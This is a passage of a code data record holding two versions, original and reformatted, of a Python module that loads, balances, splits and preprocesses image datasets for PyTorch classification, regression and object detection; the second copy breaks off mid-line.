grid_sizes = torch.tensor(np.concatenate([np.array( # [ 1/ag for i in range(ag*ag) for o,p in anchor_scales]) # for ag in anc_grids])).float().unsqueeze(1).to(self.device) # anchors = torch.tensor(np.concatenate([anc_ctrs, anc_sizes], axis=1)).float().to(self.device) # anchor_cnr = hw2corners(anchors[:,:2], anchors[:,2:]) # self.anchors,self.anchor_cnr,self.grid_sizes,self.k = anchors,anchor_cnr,grid_sizes,k
[ "from dai_imports import*\nfrom obj_utils import*\nimport utils\n\nclass my_image_csv_dataset(Dataset):\n \n def __init__(self, data_dir, data, transforms_ = None, obj = False,\n minorities = None, diffs = None, bal_tfms = None):\n \n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n \n def __len__(self):\n return len(self.data)\n \n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir,self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n\n img = torchvision.transforms.functional.to_grayscale(img,num_output_channels=3)\n\n y = self.data.iloc[index, 1] \n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms,'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l) \n else: \n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms \n self.tfms = transforms.Compose(self.transforms_)\n # print(self.tfms)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else: \n self.tfms = transforms.Compose(self.transforms_) \n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s,tuple):\n s = s[0]\n row_scale = s/img.size[0]\n col_scale = s/img.size[1]\n y = rescale_bbox(y,row_scale,col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = (y,y2)\n return (x,y)\n\n\nclass my_image_folder(DatasetFolder):\n \n def __init__(self, root, transform=None, target_transform=None,\n loader=default_loader, minorities=None, diffs = None, bal_tfms=None, tta_tfms = None):\n \n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform,\n target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self,index):\n \n path, target = self.samples[index] \n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms,'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l) \n else: \n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self.transform )\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else: \n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\ndef extract_data(dt):\n\n x = []\n y = []\n for a,b in dt:\n x.append(a)\n y.append(b)\n return x,y\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)] \n\ndef get_minorities(df,thresh=0.8):\n\n c = df.iloc[:,1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [1-(x/max_count) for x in lc]\n diffs = dict((k,v) for k,v in zip(c.keys(),diffs))\n minorities = [c.keys()[x] for x,y in enumerate(lc) if y < (thresh*max_count)]\n return minorities,diffs\n\ndef csv_from_path(path, img_dest):\n\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name,name)\n new_path = img_dest/new_name\n# print(new_path)\n os.rename(i,new_path)\n tr_images.append(new_name)\n tr_labels.append(label) \n # os.rmdir(l)\n tr_img_label = {'Img':tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label,columns=['Img','Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\ndef add_extension(a,e):\n a = [x+e for x in a]\n return a\n\ndef one_hot(targets, multi = False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot,binerizer.classes_\n\ndef get_index(arr,a):\n for i in range(len(arr)):\n if sum(arr[i] == a) == len(a):\n return i\n return False\n\ndef rescale_bbox(bb,row_scale,col_scale):\n bb = bb.reshape((-1,4))\n for b in bb:\n r1,c1,r2,c2 = b\n b[0] = int(np.round(r1*col_scale))\n b[1] = int(np.round(c1*row_scale))\n b[2] = int(np.round(r2*col_scale))\n b[3] = int(np.round(c2*row_scale))\n\n # bb = torch.tensor([bb_hw(b) for b in bb.reshape(-1,4)])\n # for b in bb:\n # r1,c1,r2,c2 = b\n # b[0] = int(np.round(r1*row_scale))\n # b[1] = int(np.round(c1*col_scale))\n # b[2] = int(np.round(r2*row_scale))\n # b[3] = int(np.round(c2*col_scale))\n # if(sum(b)) == 1:\n # b[0],b[1],b[2],b[3] = 0,0,0,0\n\n bb = bb.reshape((1,-1)) \n return bb\n\ndef get_img_stats(dataset,sz):\n\n size = int(len(dataset)*sz)\n i = 0\n imgs = []\n for img,_ in dataset:\n # print(img.size())\n if i > size:\n break\n imgs.append(img)\n i+=1\n imgs_ = torch.stack(imgs,dim=3)\n imgs_ = imgs_.view(3,-1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean,imgs_std\n\ndef split_df(train_df,test_size = 0.15):\n try: \n train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2,stratify = train_df.iloc[:,1])\n except:\n train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2)\n train_df = train_df.reset_index(drop = True)\n val_df = val_df.reset_index(drop = True)\n return train_df,val_df \n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\ndef load_obj(path):\n with open(path, 'rb') as f:\n return pickle.load(f)\n\nclass DataProcessor:\n \n def __init__(self, data_path = None, train_csv = None, val_csv = None, reg = False,\n tr_name = 'train', val_name = 'val', test_name = 'test', extension = None, setup_data = True):\n \n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n \n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n \n self.data_path,self.train_csv,self.val_csv,self.reg,self.tr_name,self.val_name,self.test_name,self.extension = (data_path,train_csv,\n val_csv,reg,tr_name,val_name,test_name,extension)\n \n self.obj = False\n self.multi_label = False\n \n if setup_data:\n self.set_up_data()\n \n def set_up_data(self,split_size = 0.15):\n\n data_path,train_csv,val_csv,tr_name,val_name,test_name = (self.data_path,self.train_csv,self.val_csv,self.tr_name,self.val_name,self.test_name)\n\n # check if paths given and also set paths\n \n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path,tr_name)\n val_path = os.path.join(data_path,val_name)\n test_path = os.path.join(data_path,test_name)\n\n if os.path.exists(os.path.join(data_path,tr_name+'.csv')):\n train_csv = tr_name+'.csv'\n # if os.path.exists(os.path.join(data_path,val_name+'.csv')):\n # val_csv = val_name+'.csv'\n # if os.path.exists(os.path.join(data_path,test_name+'.csv')):\n # test_csv = test_name+'.csv' \n\n # paths to csv\n\n if not train_csv:\n print('no')\n train_csv,val_csv,test_csv = self.data_from_paths_to_csv(data_path,tr_path,val_path,test_path)\n\n train_csv_path = os.path.join(data_path,train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True \n img_names = [str(x) for x in list(train_df.iloc[:,0])]\n if self.extension:\n img_names = add_extension(img_names,self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path,val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str,list(val_df.iloc[:,1])))\n if test_csv:\n test_csv_path = os.path.join(data_path,test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str,list(test_df.iloc[:,1]))) \n targets = list(map(str,list(train_df.iloc[:,1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n\n # bounding boxes\n\n int_targets = [list(map(float,x)) for x in split_targets]\n zero_targets = np.zeros((len(targets),max(lengths)),dtype=int)\n for i,t in enumerate(zero_targets):\n t[len(t)-len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets]\n\n # one-hot classes\n\n obj_targets = list(map(str,list(train_df.iloc[:,2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int,x)) for x in obj_split_targets]\n except:\n pass\n dai_onehot,onehot_classes = one_hot(obj_split_targets,True)\n # train_df['one_hot'] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot]\n\n # class indexes\n\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in obj_split_targets]\n zero_idx = np.zeros((len(targets),max(lengths)//4),dtype=int)\n # print(zero_idx.shape)\n for i,t in enumerate(zero_idx):\n # temp_l = len(class_idx[i])\n # if temp_l > 90:\n # print(i,temp_l)\n t[len(t)-len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:,2] = [torch.from_numpy(z).type(torch.LongTensor) for z in zero_idx]\n self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes\n # self.set_up_object_detection([4,2,1],[0.7, 1., 1.3],[(1.,1.), (1.,0.5), (0.5,1.)])\n\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int,x)) for x in split_targets]\n zero_targets = np.zeros((len(targets),max(lengths)),dtype=int)\n for i,t in enumerate(zero_targets):\n t[len(t)-len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets]\n self.data_dir,self.num_classes,self.class_names = data_path, max(lengths),np.unique(zero_targets,axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int,x)) for x in split_targets]\n except:\n pass\n dai_onehot,onehot_classes = one_hot(split_targets,self.multi_label)\n train_df.iloc[:,1] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot]\n self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:,1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:,1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:,1] = target_ids \n self.data_dir,self.num_classes,self.class_names = data_path,len(unique_targets),unique_targets\n\n # self.models_path = os.path.join(self.data_dir, 'models')\n # os.makedirs(self.models_path,exist_ok=True)\n\n if not val_csv:\n train_df,val_df = split_df(train_df,split_size)\n if not test_csv: \n val_df,test_df = split_df(val_df,split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:,0])]\n val_images = [str(x) for x in list(val_df.iloc[:,0])]\n test_images = [str(x) for x in list(test_df.iloc[:,0])]\n if self.extension:\n tr_images = add_extension(tr_images,self.extension)\n val_images = add_extension(val_images,self.extension)\n test_images = add_extension(test_images,self.extension)\n train_df.iloc[:,0] = tr_images\n val_df.iloc[:,0] = val_images\n test_df.iloc[:,0] = test_images\n train_df.to_csv(os.path.join(data_path,'train.csv'),index=False)\n val_df.to_csv(os.path.join(data_path,'val.csv'),index=False)\n test_df.to_csv(os.path.join(data_path,'test.csv'),index=False)\n self.minorities,self.class_diffs = None,None\n if (not self.obj) or (not self.multi_label):\n self.minorities,self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name:train_df, self.val_name:val_df, self.test_name:test_df}\n data_dict = {'data_dfs':self.data_dfs,'data_dir':self.data_dir,'num_classes':self.num_classes,'class_names':self.class_names,\n 'minorities':self.minorities,'class_diffs':self.class_diffs,'obj':self.obj,'multi_label':self.multi_label}\n # save_obj(data_dict,os.path.join(self.data_dir,'data_dict.pkl'))\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self,data_path,tr_path,val_path = None,test_path = None):\n \n train_df = csv_from_path(tr_path,tr_path)\n train_df.to_csv(os.path.join(data_path,self.tr_name+'.csv'),index=False)\n ret = (self.tr_name+'.csv',None)\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path,tr_path)\n val_df.to_csv(os.path.join(data_path,self.val_name+'.csv'),index=False)\n ret = (self.tr_name+'.csv',self.val_name+'.csv')\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path,tr_path)\n test_df.to_csv(os.path.join(data_path,self.test_name+'.csv'),index=False)\n ret = (self.tr_name+'.csv',self.val_name+'.csv',self.test_name+'.csv') \n return ret\n \n def get_data(self, data_dict = None, s = (224,224), dataset = my_image_csv_dataset, bs = 32, balance = False, tfms = None,\n bal_tfms = None, tta = False, num_workers = 4, stats_percentage = 0.6):\n \n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs,data_dir,minorities,class_diffs,obj,multi_label = (data_dict['data_dfs'],data_dict['data_dir'],data_dict['minorities'],\n data_dict['class_diffs'],data_dict['obj'],data_dict['multi_label'])\n if obj or multi_label:\n balance = False \n if tta:\n tta_tfms = {self.tr_name: transforms.Compose( \n [\n# transforms.TenCrop(s),\n transforms.FiveCrop(s[0]), \n transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops:torch.stack(\n [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))\n \n ]),\n self.val_name: transforms.Compose(\n [\n# transforms.TenCrop(s),\n transforms.FiveCrop(s[0]),\n transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops:torch.stack(\n [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))\n ]),\n self.test_name: transforms.Compose(\n [\n# transforms.TenCrop(s),\n transforms.FiveCrop(s[0]),\n transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops:torch.stack(\n [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))\n ])}\n# tta_tfms = {self.tr_name: transforms.Compose([\n# transforms.Resize(s),\n# transforms.ToTensor(),\n# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n# ]),\n# self.val_name: transforms.Compose([\n# transforms.Resize(s), \n# transforms.ToTensor(),\n# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n# ]) }\n \n else:\n tta_tfms = None\n \n if not bal_tfms:\n bal_tfms = { self.tr_name: [transforms.RandomHorizontalFlip()],\n \n self.val_name: None,\n self.test_name: None \n }\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n # resize_transform = transforms.RandomResizedCrop(s[0])\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [\n resize_transform,\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]\n else:\n \n tfms_temp = [\n resize_transform,\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n \n data_transforms = {\n self.tr_name: tfms,\n self.val_name: [\n # transforms.Resize(s[0]+50),\n # transforms.CenterCrop(s[0]),\n transforms.Resize(s),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ],\n self.test_name: [\n # transforms.Resize(s[0]+50),\n # transforms.CenterCrop(s[0]),\n transforms.Resize(s),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]\n }\n\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir,self.tr_name),data_dfs[self.tr_name],temp_tfms)\n self.img_mean,self.img_std = get_img_stats(temp_dataset,stats_percentage)\n data_transforms[self.tr_name][-1].mean,data_transforms[self.tr_name][-1].std = self.img_mean,self.img_std\n data_transforms[self.val_name][-1].mean,data_transforms[self.val_name][-1].std = self.img_mean,self.img_std\n data_transforms[self.test_name][-1].mean,data_transforms[self.test_name][-1].std = self.img_mean,self.img_std\n\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x],\n data_transforms[x],obj,minorities,class_diffs,bal_tfms[x])\n for x in [self.tr_name, self.val_name, self.test_name]} \n else:\n image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x],\n data_transforms[x],obj)\n for x in [self.tr_name, self.val_name, self.test_name]}\n \n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=bs,\n shuffle=True, num_workers=num_workers)\n for x in [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name, self.val_name, self.test_name]}\n \n self.image_datasets,self.dataloaders,self.dataset_sizes = (image_datasets,dataloaders,\n dataset_sizes)\n \n return image_datasets,dataloaders,dataset_sizes\n\n def imshow(self,inp, title=None):\n \n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self,inp,calculate = False):\n\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else: \n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp \n \n def show_data(self,folder_name = 'train', size = (64,64), bs = 5):\n \n self.get_data(size,bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0],batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes]) \n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(torch.LongTensor))] for x in classes]) \n else: \n self.imshow(out, title=[self.class_names[x] for x in classes])\n\n # def set_up_object_detection(self,anc_grids,anc_zooms,anc_ratios,num_colr = 12):\n\n # # print('Would you like to give your own values for anchor_grids, anchor_zooms,and anchor_ratios? The default values are: {}, {} and {}'\n # # .format(anc_grids,anc_zooms,anc_ratios))\n # # print('If so, you may call the function \"set_up_object_detection\" with your own paramteres.')\n\n # cmap = get_cmap(num_colr)\n # self.colr_list = [cmap(float(x)) for x in range(num_colr)]\n # self.num_colr = num_colr\n # self.create_anchors(anc_grids,anc_zooms,anc_ratios)\n # self.custom_head = SSD_MultiHead(self.k,self.num_classes,0.45,-4.)\n # self.loss_f = FocalLoss(self.num_classes)\n\n # def create_anchors(self,anc_grids,anc_zooms,anc_ratios):\n \n # anchor_scales = [(anz*i,anz*j) for anz in anc_zooms for (i,j) in anc_ratios]\n # k = len(anchor_scales)\n # anc_offsets = [1/(o*2) for o in anc_grids]\n # anc_x = np.concatenate([np.repeat(np.linspace(ao, 1-ao, ag), ag)\n # for ao,ag in zip(anc_offsets,anc_grids)])\n # anc_y = np.concatenate([np.tile(np.linspace(ao, 1-ao, ag), ag)\n # for ao,ag in zip(anc_offsets,anc_grids)])\n # anc_ctrs = np.repeat(np.stack([anc_x,anc_y], axis=1), k, axis=0)\n # anc_sizes = np.concatenate([np.array([[o/ag,p/ag] for i in range(ag*ag) for o,p in anchor_scales])\n # for ag in anc_grids])\n # grid_sizes = torch.tensor(np.concatenate([np.array(\n # [ 1/ag for i in range(ag*ag) for o,p in anchor_scales])\n # for ag in anc_grids])).float().unsqueeze(1).to(self.device)\n # anchors = torch.tensor(np.concatenate([anc_ctrs, anc_sizes], axis=1)).float().to(self.device)\n # anchor_cnr = hw2corners(anchors[:,:2], anchors[:,2:])\n # self.anchors,self.anchor_cnr,self.grid_sizes,self.k = anchors,anchor_cnr,grid_sizes,k \n\n\n\n\n\n\n\n\n", "from dai_imports import *\nfrom obj_utils import *\nimport utils\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\ndef csv_from_path(path, img_dest):\n path = Path(path)\n img_dest = Path(img_dest)\n labels_paths = list(path.iterdir())\n tr_images = []\n tr_labels = []\n for l in labels_paths:\n if l.is_dir():\n for i in list(l.iterdir()):\n if i.suffix in IMG_EXTENSIONS:\n name = i.name\n label = l.name\n new_name = '{}_{}'.format(path.name, name)\n new_path = img_dest / new_name\n os.rename(i, new_path)\n tr_images.append(new_name)\n tr_labels.append(label)\n tr_img_label = {'Img': tr_images, 'Label': tr_labels}\n csv = pd.DataFrame(tr_img_label, columns=['Img', 'Label'])\n csv = csv.sample(frac=1).reset_index(drop=True)\n return csv\n\n\ndef add_extension(a, e):\n a = [(x + e) for x in a]\n return a\n\n\ndef one_hot(targets, multi=False):\n if multi:\n binerizer = MultiLabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n else:\n binerizer = LabelBinarizer()\n dai_1hot = binerizer.fit_transform(targets)\n return dai_1hot, binerizer.classes_\n\n\ndef get_index(arr, a):\n for i in range(len(arr)):\n if sum(arr[i] == a) == len(a):\n return i\n return False\n\n\ndef rescale_bbox(bb, row_scale, col_scale):\n bb = bb.reshape((-1, 4))\n for b in bb:\n r1, c1, r2, c2 = b\n b[0] = int(np.round(r1 * col_scale))\n b[1] = int(np.round(c1 * row_scale))\n b[2] = int(np.round(r2 * col_scale))\n b[3] = int(np.round(c2 * row_scale))\n bb = bb.reshape((1, -1))\n return bb\n\n\ndef get_img_stats(dataset, sz):\n size = int(len(dataset) * sz)\n i = 0\n imgs = []\n for img, _ in dataset:\n if i > size:\n break\n imgs.append(img)\n i += 1\n imgs_ = torch.stack(imgs, dim=3)\n imgs_ = imgs_.view(3, -1)\n imgs_mean = imgs_.mean(dim=1)\n imgs_std = imgs_.std(dim=1)\n return imgs_mean, imgs_std\n\n\ndef split_df(train_df, test_size=0.15):\n try:\n train_df, val_df = train_test_split(train_df, test_size=test_size,\n random_state=2, stratify=train_df.iloc[:, 1])\n except:\n train_df, val_df = train_test_split(train_df, test_size=test_size,\n random_state=2)\n train_df = train_df.reset_index(drop=True)\n val_df = val_df.reset_index(drop=True)\n return train_df, val_df\n\n\ndef save_obj(obj, path):\n with open(path, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_obj(path):\n with open(path, 'rb') as f:\n return pickle.load(f)\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for 